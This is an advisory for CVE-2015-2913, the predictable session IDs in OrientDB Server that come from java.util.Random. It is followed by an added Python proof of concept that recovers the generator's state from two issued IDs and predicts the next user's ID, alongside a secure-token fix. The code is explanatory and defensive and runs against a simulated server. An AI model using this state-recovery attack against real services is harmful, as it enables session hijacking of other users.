PT-2015-5971 · Orientdb · Orientdb Server Community Edition
Raffaela Frank · Published 2015-12-31 · Updated 2018-10-18
CVE-2015-2913
CVSS v3.1: 5.9 (Medium)
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions
OrientDB Server Community Edition versions 2.0.0 through 2.0.14
OrientDB Server Community Edition versions 2.1.x prior to 2.1.1
Description
The server generates HTTP session ID values with java.util.Random in server/network/protocol/http/OHttpSessionManager.java. java.util.Random is a 48-bit linear congruential generator, not a cryptographically secure PRNG: each 32-bit output reveals all but 16 bits of its internal state, so an attacker who can observe the generator's output (for example through session IDs the server issues to the attacker) can recover the full state with at most 65,536 trials and then compute every value the generator will produce next. A remote attacker can therefore predict the session ID values issued to other users.
Recommendations
For OrientDB Server Community Edition versions 2.0.0 through 2.0.14, update to version 2.0.15 or later.
For OrientDB Server Community Edition versions 2.1.x prior to 2.1.1, update to version 2.1.1 or later.
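The state-recovery attack the description refers to, and the kind of generator the recommended versions should be using instead, as an added example that is not OrientDB's code or part of this advisory. It reimplements java.util.Random's LCG in Python from the constants documented for that class (multiplier 0x5DEECE66D, addend 0xB, 48-bit state, top 32 bits returned by nextInt()), so it runs without a JVM. The session-id format (a hex-encoded nextInt()), the seed values and the function names are assumptions made for illustration, not OrientDB's actual format; the attack itself never needs the seed, only two consecutive outputs.

```python
"""Recovering java.util.Random's state from two nextInt() outputs (added example)."""
import secrets

# Documented constants of java.util.Random's 48-bit LCG.
MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1


def _to_signed32(value):
    """Mimic Java's (int) cast on a non-negative value."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value >= (1 << 31) else value


class JavaRandom:
    """Minimal reimplementation of java.util.Random: seeded constructor and nextInt()."""

    def __init__(self, seed):
        self.seed = (seed ^ MULTIPLIER) & MASK  # Java scrambles the seed on construction

    def next_int(self):
        self.seed = (self.seed * MULTIPLIER + ADDEND) & MASK
        return _to_signed32(self.seed >> 16)  # nextInt() = top 32 of 48 state bits


def recover_state(out1, out2):
    """Return the 48-bit state after out2, given two consecutive nextInt() outputs.

    out1 is the top 32 bits of the state that produced it, so only the low 16
    bits are unknown: try all 65536 and keep the one that reproduces out2.
    The 32-bit check against a 16-bit search makes a false match very unlikely;
    None means the two values are not consecutive java.util.Random outputs.
    """
    hi = (out1 & 0xFFFFFFFF) << 16
    want = out2 & 0xFFFFFFFF
    for low in range(1 << 16):
        nxt = ((hi | low) * MULTIPLIER + ADDEND) & MASK
        if nxt >> 16 == want:
            return nxt
    return None


def predict_next(state):
    """Advance a recovered state once; return (new_state, predicted nextInt())."""
    nxt = (state * MULTIPLIER + ADDEND) & MASK
    return nxt, _to_signed32(nxt >> 16)


# --- Hypothetical session handling, constructed for this example ---

def issue_session_id(rng):
    """Weak server: the session id is a hex-encoded nextInt() from one shared Random."""
    return f"{rng.next_int() & 0xFFFFFFFF:08x}"


def predict_third_session(sid1, sid2):
    """Attacker: from two session ids it was issued, predict the next id the server issues."""
    state = recover_state(int(sid1, 16), int(sid2, 16))
    if state is None:
        return None
    return f"{predict_next(state)[1] & 0xFFFFFFFF:08x}"


def secure_session_id():
    """Fixed approach: 128 bits from the OS CSPRNG (the Java equivalent is SecureRandom)."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    server_rng = JavaRandom(20151231)   # assumed seed; the attack does not depend on it
    mine = [issue_session_id(server_rng) for _ in range(2)]  # attacker logs in twice
    victim = issue_session_id(server_rng)                     # next id goes to someone else
    print("predicted:", predict_third_session(*mine), "actual:", victim)
    print("secure id:", secure_session_id())
```

Two observed outputs suffice because java.util.Random keeps only 16 bits back per call; a third output only confirms the recovered state. The fix is not a larger seed or a per-request reseed but a different generator class: SecureRandom (or, outside Java, the OS CSPRNG as above) has no recoverable linear state.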
Fix
Use of Insufficiently Random Values
Information Disclosure
Related Identifiers
Affected Products
Orientdb Server Community Edition